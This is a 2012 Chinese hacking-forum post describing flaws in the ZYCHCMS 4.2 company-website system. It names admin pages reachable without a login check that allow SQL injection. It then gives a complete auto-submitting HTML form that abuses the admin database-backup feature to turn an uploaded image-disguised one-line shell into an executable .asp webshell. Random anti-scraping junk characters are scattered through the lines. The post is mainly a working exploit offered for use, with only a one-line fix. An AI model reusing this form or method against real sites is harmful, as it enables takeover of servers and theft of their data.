找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1755|回复: 0
打印 上一主题 下一主题

ZYCHCMS企业网站管理系统SQL注入漏洞及后台拿webshell

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-10 21:09:51 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

" S5 `. m6 d$ l' m/ j% q  M# f8 ?# O, ?% Y5 c

' N2 k+ N) W2 I: _0 e
9 `6 [( u# Z, p; W0 F. _: u影响版本:ZYCHCMS企业网站管理系统4.2(存在以下两个文件的版本应该是通杀): r  c) @1 V; ]
①SQL注射漏洞
- X4 O: }1 X' e0 n 漏洞文件:/admin/add_js.asp & /admin/add_xm_jiang.asp
6 Q- r( b9 |% j# N* g" g 漏洞原因:未过滤; a4 @! S. b% N
漏洞代码:' t" N8 F5 {; H- b
都是相同的,文件开头没有调用过滤文件/admin/seeion.asp,导致没有对当前权限进行判断,就直接操作数据库。
- H( F! d; p2 W5 f- F: I6 Y 修复方法:在文件开头加入代码1 I/ G; {% W$ m! C* W0 |; [$ T- c) n

, X7 L7 u0 h9 f& p
3 g% q. n5 }7 M$ |+ H( p②后台拿WBSHELL
% k: n+ ^1 T6 \, P' ]( I 进入后台有一个数据库备份,可以通过本地提交突破创建.asp后缀文件夹,并将一句话备份进去。* Q) z% I; [: H3 z; V
这里在网上找了一个,改了下,将就着用。+ |7 n& |( x' x" ^
以下是代码本地提交代码  t4 {9 `$ x( f/ V) i" z  }

0 P. ^8 M: W( `; C$ x' _7 D8 K. C6 t  ~- q
<form method=”post” action=”http://localhost/admin/Manage_backup.asp?action=Backup” name=add>
+ v4 B4 n3 }( t' V- U5 Z <!–eg:http://127.0.0.1:99/admin/Manage_backup.asp?action=Backup–>
  f8 X' W+ V& Q* z <tr>7 ]( t4 S5 n% t$ `5 G  q1 A/ ]
<td height=”30″ background=”images/bg_list.gif”><div style=”padding-left:10px; font-weight:bold; color:#FFFFFF; text-align:left”>备份数据库</div></td>/ L* n; x! A; q  {$ k5 O8 C
</tr>( w! F& H# x3 w3 z: `' @) w$ O
<tr>/ }4 _- ^+ ~3 H, l2 [. x
<td bgcolor=”#FFFFFF”><span class=”back_southidc”>( E9 {& S; N- D0 ^" [
</span>
, f0 ^6 \: O8 y1 E+ B <table width=”100%” border=”0″ align=”center” cellpadding=”5″ cellspacing=”0″ >
' P9 ^3 d2 C0 N3 Z2 m6 D  @# r <tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″ >
8 n0 g& ~& _+ p* U <td height=”25″ width=”30%” class=”td”><div align=”left”>当前数据库路径</div></td>7 Q2 Y5 L/ B( a. k6 O
<td width=”70%” class=”td”>90sec. K5 L9 v8 S8 d1 l0 |) B" A+ @3 r& a  U8 Q  f, ]
<div align=”left”>
$ b4 H: s' i- m. ^ <input type=”text” size=”30″ name=”DBpath” value=”此处为你在其网站上传的图片格式一句话路径” />& E* J0 H; Y* L9 h, Y, U1 f
<!–eg:../uploadfile/image/Logo/20120803130885328532_ZYCH.jpg>! y9 t- a& r& n, r5 m- q% J
<input type=”hidden” size=”50″ name=”bkfolder” value=”123.asp” />
6 ~7 Q- }! K& e8 o </div></td>3 ~/ v' I% B4 P6 f! S) T
</tr>
4 K% W* E7 L( ]% [  |* A0 g2 Q <tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#FFFFFF’” bgcolor=”#FFFFFF”>
% P( T  V9 |/ r" Y( t3 ~+ a5 o <td height=”25″ width=”30%” class=”td”><div align=”left”>备份数据库名称</div></td>
. G, T7 d  i% [7 z2 @( v4 M! S <td class=”td”><div align=”left”>
3 j" Q7 \5 A1 i/ m2 \( G <input type=”text” size=”30″ name=”bkDBname” value=”4.mdb” />& a3 K4 U2 V( `
[如备份目录有该文件,将覆盖,如沒有,将自动创建]</div></td>
. E* W* d: t9 z </tr>
/ p# X# l% Y. D- u* S" o+ P <tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″>
: l* ?$ ~& p0 Q! q( z <td height=”25″ width=”30%” class=”td”><div align=”left”></div></td>
' {" i5 S* M: ^, l <td class=”td”><div align=”left”>4 `) y! J1 U' e! ^
<input type=”submit” value=”确定备份” class=”btn”9 ?8 y# r5 g5 H8 H
</div></td>" S1 \" v/ M8 `# ]+ t! w# m) W7 r
</tr>
0 u, s0 f) V0 a* W: f </table></td></tr></form>
: Y2 ]- W8 _6 {7 V8 o! ] </table>
8 }# h% J% R# ~5 q  x </td>/ \9 X! r+ n( \9 u" ~
</tr>
% Z2 f; W. L7 n+ ~7 c! o3 O8 T </table>
% [+ w: \7 Q) G1 p# a <script>
& B0 q  y$ z" D9 G) p document.all.add.submit();
: F+ w; S% }! s0 b9 m </script>, s) Z( P, C- ]9 k7 z' x5 W
' q% }% v: I  u' J' `% {
& v1 G& k4 {8 X9 M+ C. F5 G
* T8 V% I& u3 [+ s0 N# c! a1 O# p

! {0 u9 c  C; C( S7 h1 @* u& t$ p- u/ U0 v* a9 f

; Y' F  D. ~( S& ~* S3 z6 Q/ @! b+ O0 L+ i' U& I  }
" f& ?  [2 H# x* x7 F
  a6 ?3 g7 y2 F3 W
  ~, B9 T$ `; W( j" c3 V
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表